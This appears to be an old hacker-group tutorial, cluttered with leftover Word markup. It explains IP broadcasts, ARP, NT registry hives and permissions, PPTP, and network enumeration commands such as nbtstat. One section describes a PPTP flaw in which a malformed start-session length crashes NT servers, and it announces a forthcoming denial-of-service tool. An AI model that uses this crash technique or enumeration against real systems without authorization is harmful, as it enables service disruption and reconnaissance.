Ethernet. If you use an Ethernet address with all its bits on (all ones), every machine on the Ethernet is supposed to look at that datagr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though the official broadcast address for network 128.6.4 is now 128.6.4.255, there are some other addresses that may be treated as broadcasts by certain implementations. For convenience, the standa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so allows 255.255.255.255 to be used. This refers to all hosts on the local network. It is often simpler to use 255.255.255.255 instead of finding out the network number for the local network and forming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roadcast address such as 128.6.4.255. In addition, certain older implementations may use 0 instead of 255 to form the broadcast address. Such implementations would use 128.6.4.0 instead of 128.6.4.255 as the broadcast address on network 128.6.4. Finally, certain older implementations may not understand about subnets. Thus they consider the network number to be 128.6. In that case, they will assume a broadcast address of 128.6.255.255 or 128.6.0.0. Until support for broadcasts is implemented properly, it can be a somewhat dangerous feature to u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cause 0 and 255 are used for unknown and broadcast addresses, normal hosts should never be given addresses containing 0 or 255. Addresses should never begin with 0, 127, or any number above 223. Addresses violating these rules are sometimes referred to as "Martians", because of rumors that the Central University of Mars is using network 22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1.9] Datagram Fragmentation and Reassemb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CP/IP is designed for use with many different kinds of network. Unfortunately, network designers do not agree about how big packets can be. Ethernet packets can be 1500 octets long. Arpanet packets have a maximum of around 1000 octets. Some very fast networks have much larger packet sizes. At first, you might think that IP should simply settle on the smallest possible size. Unfortunately, this would cause serious performance problems. When transferring large files, big packets are far more efficient than small ones. So we want to be able to use the largest packet size possible. But we also want to be able to handle networks with small limi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are two provisions for this. First, TCP has the ability to "negotiate" about datagram size. When a TCP connection first opens, both ends can send the maximum datagram size they can handle.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maller of these numbers is used for the rest of the connection. This allows two implementations that can handle big datagrams to use them, but also lets them talk to implementations that can't handle them. However this doesn't completely solve the problem. The most serious problem is that the two ends don't necessarily know about all of the steps in between. For example, when sending data between Rutgers and Berkeley, it is likely that both computers will be on Ethernets. Thus they will both be prepared to handle 1500-octet datagrams. However the connection will at some point end up going over the Arpanet. It can't handle packets of that size. For this reason, there are provisions to split datagrams up into pieces. (This is referred to as "fragmentation".) The IP header contains fields indicating the  datagram has been split, and enough information to let the pieces be put back together. If a gateway connects an Ether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the Arpanet, it must be prepared to take 1500-octet Ethernet packets and split them into pieces that will fit on the Arpanet. Furthermore, every host implementation of TCP/IP must be prepared to accept pieces and put them back together. This is referred to as "reassemb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CP/IP implementations differ in the approach they take to deciding on datagram size. It is fairly common for implementations to use 576-byte datagrams whenever they can't verify that the entire path is able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andle larger packets. This rather conservative strategy is used because of the number of implementations with bugs in the code to reassemble fragments. Implementors often try to avoid ever having fragmentation occur. Different implementors take different approaches to deciding when it is safe to use large datagrams. Some use them only for the local network. Others will use them for any network on the same campus. 576 bytes is a "safe" size, which every implementation must suppo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2.0] Ethernet encapsulation: AR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was a brief discussion earlier about what IP datagrams look like on an Ethernet. The discussion showed the Ethernet header and checksum. However it left one hole: It didn't say how to figure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at Ethernet address to use when you want to talk to a given Internet address. In fact, there is a separate protocol for this, called ARP ("address resolution protocol"). (Note by the way that ARP is not an IP protocol. That is, the ARP datagrams do not have IP head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uppose you are on system 128.6.4.194 and you want to connect to system 128.6.4.7. Your system will first verify that 128.6.4.7 is on the same network, so it can talk directly via Ethernet. Then it will look up 128.6.4.7 in its ARP table, to see if it already knows the Ethernet address. If so, it will stick on an Ethernet header, and send the packet. But suppose this system is not in the ARP table. There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 way to send the packet, because you need the Ethernet address. So it uses the ARP protocol to send an ARP request. Essentially an ARP request says "I need the Ethernet address for 128.6.4.7". Every system listens to ARP requests. When a system sees an ARP request for itself, it is required to respond. So 128.6.4.7 will see the request, and will respond with an ARP reply saying in effect "128.6.4.7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20:1:56:34". (Recall that Ethernet addresses are 48 bits. This is 6 octets. Ethernet addresses are conventionally shown in hex, using the punctuation shown.) Your system will save this information in i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RP table, so future packets will go directly. Most systems treat the ARP table as a cache, and clear entries in it if they have not been used in a certain period of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by the way that ARP requests must be sent as "broadcasts". There is no way that an ARP request can be sent directly to the right system. After all, the whole reason for sending an ARP request is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don't know the Ethernet address. So an Ethernet address of all ones is used, i.e. ff:ff:ff:ff:ff:ff. By convention, every machine on the Ethernet is required to pay attention to packets with this as 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ress. So every system sees every ARP requests. They all look to see whether the request is for their own address. If so, they respond. If not, they could just ignore it. (Some hosts will use ARP requests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pdate their knowledge about other hosts on the network, even if the request isn't for them.) Note that packets whose IP address indicates broadcast (e.g. 255.255.255.255 or 128.6.4.255) are also sent with an Ethernet address that is all o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0.0] Preface to the WindowsNT Regi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section is not meant for NT engineers that already know the registry, and its not meant for people that have read the 800+ page books on the registry I've seen. This section is meant as a quick guide to get people understanding exactly what this registry thing i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0.1] What is the Regi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windows registry provides for a somewhat secure, unified database that stores configuration information into a hierarchical model. Until recently, configuration files such as WIN.INI, were the only way to configure windows applications and operating system functions. In todays NT 4 environment, the registry replaces these .INI files. Each key in the registry is similar to bracketed headings in an .INI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e of the main disadvantages to the older .INI files is that those files are flat text files, which are unable to support nested headings or contain data other than pure text. Registry keys can contain nested headings in the form of subkeys. These subkeys provide finer details and a greater range to the possible configuration information for a particular operating system. Registry values can also consist of executable code, as well as provide individual preferences for multiple users of the same computer. The ability to store executable code within the Registry extends its usage to operating system system and application developers. The ability to store user-specific profile information allows one to tailor the environment for specific individual us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view the registry of an NT server, one would use the Registry Editor tool. There are two versions of Registry Edi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gedt32.exe has the most menu items and more choices for the menu items. You can search for keys and subkeys in the regi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gedit.exe enables you to search for strings, values, keys, and subkeys and export keys to .reg files. This feature is useful if you want to find specific da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ease of use, the Registry is divided into five seperate structures that represent the Registry database in its entirety. These five groups are known as Keys, and are discussed bel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0.2] In Depth Key Discu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CURRENT_U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registry key contains the configuration information for the user that is currently logged in. The users folders, screen colors, and control panel settings are stored here. This information is known as a User Pro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US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windowsNT 3.5x, user profiles were stored locally (by default) in the systemroot\system32\config directory. In NT4.0, they are stored in the systemroot\profiles directory. User-Specific information is kept there, as well as common, system wide user inform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change in storage location has been brought about to parallel the way in which Windows95 handles its user profiles. In earlier releases of NT, the user profile was stored as a single file - either locally in the \config directory or centrally on a server. In windowsNT 4, the single user profile has been broken up into a number of subdirectories located below the \profiles directory. The reason for this is mainly due to the way in which the Win95 and WinNT4 operating systems use the underlying directory structure to form part of their new user interfa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user profile is now contained within the NtUser.dat (and NtUser.dat.log) files, as well as the following subdirecto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pplication Data: This is a place to store application data specific to this particular u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Desktop: Placing an icon or a shortcut into this folder causes the that icon or shortcut to appear on the desktop of the u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Favorites: Provides a user with a personlized storage place for files, shortcuts and other inform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NetHood: Maintains a list of personlized network connec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Personal: Keeps track of personal documents for a particular u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PrintHood: Similar to NetHood folder, PrintHood keeps track of printers rather than network connec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Recent: Contains information of recently used da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endTo: Provides a centralized store of shortcuts and output dev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tart Menu: Contains configuration information for the users menu ite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emplates: Storage location for document templa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LOCAL_MACH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key contains configuration information particular to the computer. This information is stored in the systemroot\system32\config directory as persistent operating system files, with the exception of the volatile hardware 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information gleaned from this configuration data is used by applications, device drivers, and the WindowsNT 4 operating system. The latter usage determines what system configuration data to use, without respect to the user currently logged on. For this reason the HKEY_LOCAL_MACHINE regsitry key is of specific importance to administrators who want to support and troubleshoot NT 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LOCAL_MACHINE is probably the most important key in the registry and it contains five subkey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Hardware: Database that describes the physical hardware in the computer, the way device drivers use that hardware, and mappings and related data that link kernel-mode drivers with various user-mode code. All data in this sub-tree is re-created everytime the system is star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AM: The security accounts manager. Security information for user and group accounts and for the domains in NT 4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ecurity: Database that contains the local security policy, such as specific user rights. This key is used only by the NT 4 security sub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oftware: Pre-computer software database. This key contains data about software installed on the local computer, as well as configuration inform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ystem: Database that controls system start-up, device driver loading, NT 4 services and OS behavi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formation about the HKEY_LOCAL_MACHINE\SAM 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subtree contains the user and group accounts in the SAM database for the local computer. For a computer that is running NT 4, this subtree also contains security information for the domain. The information contained within the SAM registry key is what appears in the user interface of the User Manager utility, as well as in the lists of users and groups that appear when you make use of the Security menu commands in NT4 explor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formation about the HKEY_LOCAL_MACHINE\Security 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subtree contains security information for the local computer. This includes aspects such as assigning user rights, establishing password policies, and the membership of local groups, which are configurable in User Manag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CLASSES_ROO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information stored here is used to open the correct application when a file is opened by using Explorer and for Object Linking and Embedding. It is actually a window that reflects information from the HKEY_LOCAL_MACHINE\Software sub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CURRENT_CONFI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information contained in this key is to configure settings such as the software and device drivers to load or the display resolution to use. This key has a software and system subkeys, which keep track of configuration inform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0.3] Understanding Hiv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egistry is divided into parts called hives. These hives are mapped to a single file and a .LOG file. These files are in the systemroot\system32\config direc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gistry Hive</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>File 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LOCAL_MACHINE\SAM</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>SAM and SAM.LO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LOCAL_MACHINE\SECURITY</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Security and Security.LO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LOCAL_MACHINE\SOFTWARE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Software and Software.LO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LOCAL_MACHINE\SYSTEM</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>System and System.A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though I am not gauranteeing that these files will be easy to understand, with a little research and patience, you will learn what you want to learn. I have been asked to write a file on how to decipher the contents of those files, but I have yet to decide weather I will do it or no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QuickNo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wnership = The ownership menu item presents a dialog box that identifies the user who owns the selected registry key. The owner of a key can permit another user to take ownership of a key. In addition, a system administrator can assign a user the right to take ownership, or outright take ownership himsel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GINI.EXE = This utility is a character based console application that you can use to add keys to the NT registry by specifying a Registry scrip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0.4] Default Registry Setting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llowing table lists the major Registry hives and some subkeys and the DEFAULT access permissions assig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denotes a major hive        \denotes a subkey of the prior major hi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LOCAL_MACH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dmin-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Everyone-Read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System-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HARDW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dmin-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Everyone-Read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System-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dmin-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Everyone-Read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System-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dmin-Special (Write DAC, Read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System-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OFTW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dmin-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Creator Owner-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Everyone-Special (Query, Set, Create, Enumerate, Notify, Delete, Re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System-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dmin-Special (Query, Set, Create, Enumerate, Notify, Delete, Re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Everyone-Read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System-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CURRENT_U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dmin-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Current User-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System-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US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dmin-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Current User-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System-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T_CLASSES_ROO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dmin-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Creator Owner-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Everyone-Special (Query, Set, Create, Enumerate, Notify, Delete, Re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System-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CURRENT CONFI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dmin-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Creator Owner-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Everyone-Read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System-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0] Introduction to PPT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oint-To-Point Tunneling Protocol (PPTP) is a protocol that allows the secure exchange of data from a client to a server by forming a Virtual Private Network (VPN) via a TCP/IP based network. The strong point of PPTP is its ability to provide on demand, multi-protocol support over existing network infrastructure, such as the Internet. This ability would allow a company to use the Internet to establish a virtual private network without the expense of a leased l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technology that makes PPTP possible is an extension of the remote access Point-To-Point Protocol (PPP- which is defined and documented by the Internet Engineering Task Force in RFC 1171).  PPTP technology encapsulates PPP packets into IP datagrams for transmission over TCP/IP based networks. PPTP is currently a protocol draft awaiting standardization. The companies involved in the PPTP forum are Microsoft, Ascend Communications, 3Com/Primary Access, ECI Telematics, and US Robotic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1] PPTP and Virtual Private Network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Point-To-Point Tunneling Protocol is packaged with WindowsNT 4.0 Server and Workstation. PC's that are running this protocol  can use it to securely connect to a private network as a remote access client using a public data network such as the Intern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major feature in the use of PPTP is its support for virtual private networking. The best part of this feature is that it supports VPN's over public-switched telephone networks (PSTNs). By using PPTP a company can greatly reduce the cost of deploying a wide area, remote access solution for mobile users because it provides secure and encrypted communications over existing network structures like PSTNs or the Inter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2] Standard PPTP Deploy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general practice, there are normally three computers involved in a deploy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 PPTP cli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 Network Access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 PPTP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e network access server is optional, and if NOT needed for PPTP deployment. In normal deployment however, they are pres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a typical deployment of PPTP, it begins with a remote or mobile PC that will be the PPTP client. This PPTP client needs access to a private network by using a local Internet Service Provider (ISP). Clients who are running the WindowsNT Server or Workstation operating systems will use Dial-up networking and the Point-To-Point protocol to connect to their ISP. The client will then connect to a network access server which will be located at the ISP (Network Access Servers are also known as Front-End Processors (FEPs) or Point-Of-Presence servers (POPs)). Once connected, the client has the ability to exchange data over the Internet. The Network Access Server uses the TCP/IP protocol  for the handling of all traff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fter the client has made the initial PPP connection to the ISP, a second Dial-Up networking call is made over the existing PPP connection. Data sent using the second connection is in the form of IP datagrams that contain PPP packets, referred to as encapsulated PPP. It is this second call that creates the virtual private network connection to a PPTP server on the private company network. This is called a tunne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unneling is the process of exchanging data to a computer on a private network by routing them over some other network. The other network routers cannot access the computer that is on the private network. However, tunneling enables the routing network to transmit the packet to an intermediary computer, such as a PPTP server. This PPTP server is connected to both the company private network and the routing network, which is in this case, the Internet. Both the PPTP client and the PPTP server use tunneling to securely transmit packets to a computer on the private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the PPTP server receives a packet from the routing network (Internet), it sends it across the private network to the destination computer. The PPTP server does this by processing the PPTP packet to obtain the private network computer name or address information which is encapsulated in the PPP pack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quick note: The encapsulated PPP packet can contain multi-protocol data such as TCP/IP, IPX/SPX, or NetBEUI. Because the PPTP server is configured to communicate across the private network by using private network protocols, it is able to understand Multi-Protoco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 encapsulates the encrypted and compressed PPP packets into IP datagrams for transmission over the Internet. These IP datagrams are routed over the Internet where they reach the PPTP server. The PPTP server disassembles the IP datagram into a PPP packet and then decrypts the packet using the network protocol of the private network. As mentioned earlier, the network protocols that are supported by PPTP are TCP/IP, IPX/SPX and NetBEU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3] PPTP Cli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computer that is able to use the PPTP protocol can connect to a PPTP server two different way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By using an ISP's network access server that supports inbound PPP connec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By using a physical TCP/IP-enabled LAN connection to connect to a PPTP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 clients attempting to use an ISP's network access server must be properly configured with a modem and a VPN device to make the seperate connections to the ISP and the PPTP server. The first connection is dial-up connection utilizing the PPP protocol over the modem to an Internet Service Provider. The second connection is a VPN connection using PPTP, over the modem and through the ISP. The second connection requires the first connection because the tunnel between the VPN devices is established by using the modem and PPP connections to the inter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exception to this two connection process is using PPTP to create a virtual private network between computers physically connected to a LAN. In this scenario the client is already connected to a network and only uses Dial-Up networking with a VPN device to create the connection to a PPTP server on the L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 packets from a remote PPTP client and a local LAN PPTP client are processed differently. A PPTP packet from a remote client is placed on the telecommunication device physical media, while the PPTP packet from a LAN PPTP client is placed on the network adapter physical med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4] PPTP Architec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next area discusses the architecture of PPTP under Windows NT Server 4.0 and NT Workstation 4.0. The following section cov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PPP Protoc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PPTP Control Conne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PPTP Data Tunnel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rchitecture Overvie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ecure communication that is established using PPTP typically involves three processes, each of which requires successful completion of the previous process. This will now explain these processes and how they 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Connection and Communication: A PPTP client utilizes PPP to connect to an ISP by using a standard telephone line or ISDN line. This connection uses the PPP protocol to establish the connection and encrypt data packe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 Control Connection: Using the connection to the Internet established by the PPP protocol, the PPTP protocol creates a control connection from the PPTP client to a PPTP server on the Internet. This connection uses TCP to establish communication and is called a PPTP Tunne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 Data Tunneling: The PPTP protocol creates IP datagrams containing encrypted PPP packets which are then sent through the PPTP tunnel to the PPTP server. The PPTP server disassembles the IP datagrams and decrypts the PPP packets, and the routes the decrypted packet to the private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Protoc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are will not cover in depth information about PPP, it will cover the role PPP plays in a PPTP environment. PPP is a remote access protocol used by PPTP to send data across TCP/IP based networks. PPP encapsulates IP, IPX, and NetBEUI packets between PPP frames and sends the encapsulated packets by creating a point-to-point link between the sending and receiving compute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st PPTP sessions are started by a client dialing up an ISP network access server. The PPP protocol is used to create the dial-up connection between the client and network access server and performs the folloing func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Establishes and ends the physical connection. The PPP protocol uses a sequence defined in RFC 1661 to establish and maintain connections between remote comput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uthenticates Users. PPTP clients are authenticated by using PPP. Clear text, encrypted or MS CHAP can be used by the PPP protoc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Creates PPP datagrams that contain encrypted IPX, NetBEUI, or TCP/IP packe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 Control Conne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PTP protocol specifies a series of messages that are used for session control. These messages are sent between a PPTP client and a PPTP server. The control messages establish, maintain and end the PPTP tunnel. The following list present the primary control messages used to establish and maintain the PPTP se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Message Type</w:t>
        <w:tab/>
        <w:t>Purpo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_START_SESSION_REQUEST</w:t>
        <w:tab/>
        <w:t>Starts Se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_START_SESSION_REPLY</w:t>
        <w:tab/>
        <w:t>Replies to Start Session Requ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_ECHO_REQUEST</w:t>
        <w:tab/>
        <w:t>Maintains Se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_ECHO_REPLY</w:t>
        <w:tab/>
        <w:t>Replies to Maintain Session Requ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_WAN_ERROR_NOTIFY</w:t>
        <w:tab/>
        <w:t>Reports an error in the PPP conne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_SET_LINK_INFO</w:t>
        <w:tab/>
        <w:t>Configures PPTP Client/Server Conne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_STOP_SESSION_REQUEST</w:t>
        <w:tab/>
        <w:t>Ends Se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_STOP_SESSION_REPLY</w:t>
        <w:tab/>
        <w:t>Replies to End Session Requ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ntrol messages are sent inside of control packets in a TCP datagram. One TCP connection is enabled between the PPTP client and Server. This path is used to send and receive control messages. The datagram contains a PPP header, a TCP Header, a PPTP Control message and appropriate trailers. The construction i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Delivery Head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 Head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 Control Mess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rail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 Data Transmi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fter the PPTP Tunnel has been created, user data is transmitted between the client and PPTP server. Data is sent in IP Datagrams containing PPP packets. The IP datagram is created using a modified version of the Generic Routing Encapsulation (GRE) protocol (GRE is defined in RFC 1701 and 1702). The structure of the IP Datagram i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Delivery Head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 Head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RE Head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Head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 Head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CP Head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y paying attention to the construction of the packet, you can see how it would be able to be transmitted over the Internet as headers are stripped off. The PPP Delivery header provides information necessary for the datagram to traverse the Internet. The GRE header is used to encapsulate the PPP packet within the IP Datagram. The PPP packet is created by RAS. The PPP Packet is encrypted and if intercepted, would be unintelligi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5] Understanding PPTP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 uses the strict authentication and encryption security available to computers running RAS under WindowsNT Server version 4.0. PPTP can also protect the PPTP server and private network by ignoring all but PPTP traffic. Despite this security, it is easy to configure a firewall to allow PPTP to access the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uthentication: Initial dial-in authentication may be required by an ISP network access server. If this Authentication is required, it is strictly to log on to the ISP, it is not related to Windows NT based Authentication. A PPTP server is a gateway to your network, and as such it requires standard WindowsNT based logon. All PPTP clients must provide a user name and password. Therefore, remote access logon using a PC running under NT server or Workstation is as secure as logging on from a PC connected to a LAN (theoretically). Authentication of remote PPTP clients is done by using the same PPP authentication methods used for any RAS client dialing directly into an NT Server. Because of this, it fully supports MS-CHAP (Microsoft Challenge Handshake Authentication Protocol which uses the MD4 hash as well as earlier LAN Manager metho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ccess Control: After Authentication, all access to the private LAN continues to use existing NT based security structures. Access to resources on NTFS drives or to other network resources require the proper permissions, just as if you were connected directly to the L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ta Encryption: For data encryption, PPTP uses the RAS "shared-secret" encryption process. It is referred to as a shared-secret because both ends of the connection share the encryption key. Under Microsoft's implementation of RAS, the shared secret is the user password (Other methods include public key encryption). PPTP uses the PPP encryption and PPP compression schemes. The CCP (Compression Control Protocol) is used to negotiate the encryption used. The username and password is available to the server and supplied by the client. An encryption key is generated using a hash of the password stored on both the client and server. The RSA RC4 standard is used to create this 40-bit (128-bit inside the US and Canada is available) session key based on the client password. This key is then used to encrypt and decrypt all data exchanged between the PPTP client and server. The data in PPP packets is encrypted. The PPP packet containing the block of encrypted data is then stuffed into a larger IP datagram for rou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TP Packet Filtering: Network security from intruders can be enhanced by enabling PPTP filtering on the PPTP server. When PPTP filtering is enabled, the PPTP server on the private network accepts and routes only PPTP packets. This prevents ALL other packet types from entering the network. PPTP traffic uses port 172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6] PPTP and the Regi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following is a list of Windows NT Registry Keys where user defined PPTP information can be fou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    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RASPPTP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arameters\Configur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s: AuthenticateIncomingCal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DataType = REG_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Range = 0 - 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Default =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t this value to 1 to force PPTP to accept calls only from IP addresses listed in the PeerClientIPAddresses registry value. If AuthenticateIncomingCalls is set to 1 and there are no addresses in PeerClientIPAddresses, the no clients will be able to conne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eerClientIPAddres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DataType = REG_MULTI_SZ</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Range = The format is a valid IP add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parameter is a list of IP addresses the server will accept connections fr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    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;adapter name&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arameters\Tcpi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s: DontAddDefaultGatew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DataType = REG_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Range = 0 - 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Default = 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en PPTP is installed, a default route is made for each LAN adapter. This parameter will disable the default route on the corporate LAN adap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PTPFilter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Key: &lt;adaptername.\Paramters\tcpi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ValueType: REG_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Valid Range: 0 - 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Default =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parameter controls whether PPTP filtering is enabled or no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PTPTcpMaxDataRetransmiss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Key: Tcpip\Paramet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ValueType: REG_WORD - Number of times to retransmit a PPTP pack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Valid Range: 0 - 0xFFFFFFF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Default: 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setting control how many times PPTP will retransmit a pack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0.7] Special Security Upd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PECIAL REVISION: As a last minute revision to the lecture. A flaw has been discovered in the PPTP architecture. It turns out that if you send a that if you send a pptp start session request with an invalid packet length in the pptp packet header that it will crash an NT box and cause the NT server to do a CoreDump. Fragments of code for a DoS attack package are flying, and the rhino9 team should have a completed DoS Attack program released soon. This program is released, of course, for network administrators wanting to know how the bug wor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0] TCP/IP Commands as Too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This is list of the most commonly used TCP/IP command line tools that are used to explore and find out information from a network. These tools will be referred to later on in this document, so its usage and function will not be explained later. Please note that not all of these switches remain the same across different TCP/IP stacks. The Microsoft TCP/IP stack is almost always different than most switches used on Unix syste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1] The Arp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rp command will display internet to ethernet (IP to MAC) address translations which is normally handled by the arp protocol. When the hostname is the only parameter, this command will display the currect ARP entry for that host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arp host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witches:     -a            Displays current ARP entries by interrogating the curr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b/>
        <w:tab/>
        <w:t xml:space="preserve">      protocol data.  If inet_addr is specified, the IP and Physic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b/>
        <w:tab/>
        <w:t xml:space="preserve">      addresses for only the specified computer are displayed.  I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b/>
        <w:tab/>
        <w:t xml:space="preserve">      more than one network interface uses ARP, entries for each AR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b/>
        <w:tab/>
        <w:t xml:space="preserve">      table are display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g            Same as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inet_addr     Specifies an internet add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N if_addr    Displays the ARP entries for the network interface specifi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b/>
        <w:tab/>
        <w:t xml:space="preserve">            by if_add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d            Deletes the host specified by inet_add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s            Adds the host and associates the Internet address inet_add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b/>
        <w:tab/>
        <w:t xml:space="preserve">      with the Physical address eth_addr.  The Physical address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b/>
        <w:tab/>
        <w:t xml:space="preserve">      given as 6 hexadecimal bytes separated by hyphens. The en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b/>
        <w:tab/>
        <w:t xml:space="preserve">      is perman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eth_addr      Specifies a physical add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if_addr       If present, this specifies the Internet address of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b/>
        <w:tab/>
        <w:t xml:space="preserve">          interface whose address translation table should be modifi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b/>
        <w:tab/>
        <w:t xml:space="preserve">          If not present, the first applicable interface will b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2] The Traceroute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traceroute command is used to trace the route that a packet takes to reach its destination. This command works by using the time to live (TTL) filed in the IP pack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tracert  IP or Host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witches:    -d                 Do not resolve addresses to hostna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h maximum_hops    Maximum number of hops to search for targ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j host-list       Loose source route along host-li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w timeout         Wait timeout milliseconds for each rep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3] The Netstat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command is used to query the network subsystem regarding certain types of information. Different types of information will be received depending on the switches used in conjunction with this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netstat [swit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witches:       -A     Shows the addresses of any associated protocol control bloc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      Will show the status of all sockets. Sockets associated with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erver processes are normally not show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       Shows the state of the network interfa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m     Prints the network memory us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n      Causes netstat to show actual addresses as opposed to hostnames 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network na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r       Prints the routing t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      Tells netstat to show the per protocol statistic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       Replaces the queue length information with timer inform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4] The Finger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y default, finger will list the login name, full name, terminal name, and write status (shown as a "*" before the terminal name if write permission is denied), idle time, login time, office location, and phone number (if known) for each current user connected to the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finger  username@do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witches:     -b    Brief output form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b/>
        <w:t xml:space="preserve">       -f     Supresses the printing of the header l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     Provides a quick list of users with idle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     Forces long output form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    Supresses printing of the .plan file (if pres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q    Provides a quick list of us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    Forces short output for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   Forces narrow output for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5] The Ping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ing (Packet Internet Groper) is used to send ICMP (Internet Control Message Protocol) packets from one host to another. Ping transmits packets using the ICMP ECHO_REQUEST command and expects an ICMP ECHO_REP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ping IP address or Host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witches:    -t             Ping the specifed host until interrup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             Resolve addresses to hostna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n count       Number of echo requests to se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 size        Send buffer siz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f             Set Don't Fragment flag in pack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 TTL         Time To Li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v TOS         Type Of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r count       Record route for count ho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s count       Timestamp for count ho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j host-list   Loose source route along host-li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k host-list   Strict source route along host-li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w timeout     Timeout in milliseconds to wait for each rep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6] The Nbtstat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an be used to query the network concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and reloading the LMHOSTS file. This one command can be extremely useful when performing security audits. When one knows how to interpret the information, it can reveal more than one might thin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nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interv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witches</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-a      Lists the remote computer's name table given its host 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 xml:space="preserve">-A      Lists the remote computer's name table given its IP addr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c      Lists the remote name cache including the IP addres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w:t>
        <w:tab/>
        <w:t xml:space="preserve">         Lists the remote name cache including the IP addresses Lists local NetBIO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 xml:space="preserve">         names. Lists names resolved by broadcast and via WINS Purges and reloads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 xml:space="preserve">         remote cache name table Lists sessions table with the destination IP addres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 xml:space="preserve">         Lists sessions table converting destination IP addresses to host names via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 xml:space="preserve">         hosts fi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 xml:space="preserve">-n      Lists local NetBIOS nam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 xml:space="preserve">-r       Lists names resolved by broadcast and via WIN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 xml:space="preserve">-R     Purges and reloads the remote cache name tab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 xml:space="preserve">-S      Lists sessions table with the destination IP address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s      Lists sessions table converting destination IP addresses to host names via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 xml:space="preserve">          hosts fi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 xml:space="preserve">interval          This will redisplay the selected statistics, pausing for the number of </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">       seconds yo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                </w:t>
        <w:tab/>
        <w:t xml:space="preserve">       choose as "interval" between each listing. Press CTRL+C to sto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s on NBTST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lumn headings generated by NBTSTAT have the following meaning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p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umber of bytes receiv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utp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umber of bytes se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O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hether the connection is from the computer (outbound) or from another system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the local computer (inbou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f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e remaining time that a name table cache entry will "live" before your compu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purges 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cal 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The local NetBIOS name given to the connec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emote Ho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The name or IP address of the remote ho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yp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A name can have one of two types: unique or grou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e last byte of the 16 character NetBIOS name often means something becau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e same name can be present multiple times on the same computer. This sh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the last byte of the name converted into hex.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ta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Your NetBIOS connections will be shown in one of the following "stat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tate                   Mean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ccepting           An incoming connection is in pro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Associated        The endpoint for a connection has been created and your computer has ssociated it </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> with an IP add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Connected        This is a good state! It means you're connected to the remote resour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onnecting       Your session is trying to resolve the name-to-IP address mapping of the destination </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> resour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Disconnected   Your computer requested a disconnect, and it is waiting for the remote computer to do </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> s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Disconnecting  Your connection is end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Idle            </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> The remote computer has been opened in the current session, but is currently not </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> accepting connec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Inbound         </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> An inbound session is trying to conne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Listening       </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> The remote computer is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Outbound        </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Your session is creating the TCP conne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econnecting   If your connection failed on the first attempt, it will display this state as it tries to </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  reconne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ab/>
        <w:tab/>
        <w:t>Number</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Us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00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Workstation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01</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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_MSBROWSE_&gt;</w:t>
        <w:tab/>
        <w:t>01</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Master Brow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03</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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06</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>RAS Server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1F</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>NetDDE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20</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>File Server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21</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>RAS Client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22</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Exchange Interchang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23</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange Sto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24</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange Direc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30</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Modem Sharing Server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31</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Modem Sharing Client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43</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote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44</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Admin Remote Control To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45</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote C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46</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote Transf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4C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>DEC Pathworks TCPIP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52</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
